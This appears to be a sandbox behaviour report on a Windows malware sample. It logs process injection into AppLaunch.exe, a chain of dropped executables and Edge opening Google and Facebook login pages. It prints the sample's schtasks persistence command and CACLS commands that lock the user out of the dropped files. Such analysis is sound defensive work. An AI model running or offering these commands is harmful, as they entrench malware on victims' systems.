Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4257.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\444C.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3624 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3624 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3624 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3624 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3624 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3624 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3268 wrote to memory of 2868 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\62CC.exe
PID 3268 wrote to memory of 2868 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\62CC.exe
PID 3268 wrote to memory of 2868 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\62CC.exe
PID 3268 wrote to memory of 1876 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6FCD.exe
PID 3268 wrote to memory of 1876 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6FCD.exe
PID 3268 wrote to memory of 1876 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\6FCD.exe
PID 3268 wrote to memory of 5004 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\776F.bat
PID 3268 wrote to memory of 5004 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\776F.bat
PID 3268 wrote to memory of 5004 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\776F.bat
PID 3268 wrote to memory of 2044 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7EF2.exe
PID 3268 wrote to memory of 2044 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7EF2.exe
PID 3268 wrote to memory of 2044 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\7EF2.exe
PID 3268 wrote to memory of 4212 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8675.exe
PID 3268 wrote to memory of 4212 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8675.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1876 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\6FCD.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3268 wrote to memory of 3872 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8F40.exe
PID 3268 wrote to memory of 3872 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8F40.exe
PID 3268 wrote to memory of 3872 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8F40.exe
PID 2044 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2044 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2044 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2044 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2044 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2044 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2044 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2044 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\7EF2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2868 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\62CC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2868 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\62CC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2868 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\62CC.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe
PID 2284 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 2284 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 2284 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe
PID 1884 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 1884 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 1884 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe
PID 5008 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe
PID 5008 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe
PID 5008 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe
PID 2536 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe
PID 2536 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe
PID 2536 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe
PID 5004 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\776F.bat C:\Windows\system32\cmd.exe
PID 5004 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\776F.bat C:\Windows\system32\cmd.exe
PID 3872 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\8F40.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3872 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\8F40.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3872 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\8F40.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1696 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1696 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1696 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe

"C:\Users\Admin\AppData\Local\Temp\f344d608c3c59361f1a3d9b4ba9d61cee19dc80705659686a816b19326a14008.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3624 -ip 3624

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 160

C:\Users\Admin\AppData\Local\Temp\62CC.exe

C:\Users\Admin\AppData\Local\Temp\62CC.exe

C:\Users\Admin\AppData\Local\Temp\6FCD.exe

C:\Users\Admin\AppData\Local\Temp\6FCD.exe

C:\Users\Admin\AppData\Local\Temp\776F.bat

"C:\Users\Admin\AppData\Local\Temp\776F.bat"

C:\Users\Admin\AppData\Local\Temp\7EF2.exe

C:\Users\Admin\AppData\Local\Temp\7EF2.exe

C:\Users\Admin\AppData\Local\Temp\8675.exe

C:\Users\Admin\AppData\Local\Temp\8675.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\8F40.exe

C:\Users\Admin\AppData\Local\Temp\8F40.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2044 -ip 2044

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1876 -ip 1876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1876 -s 396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 388

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uS3Ep0xD.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IG0cq8AC.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\bL1tU9by.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Qh9By1xf.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8DE3.tmp\8DE4.tmp\8DE5.bat C:\Users\Admin\AppData\Local\Temp\776F.bat"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hU83ic7.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1696 -ip 1696

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 436 -ip 436

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 540

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZD054Xl.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ZD054Xl.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffd0f2946f8,0x7ffd0f294708,0x7ffd0f294718

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd0f2946f8,0x7ffd0f294708,0x7ffd0f294718

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2972 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,70378628735622860,10700745688261214048,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,70378628735622860,10700745688261214048,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3936 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1010164547647434954,8204489226398795367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

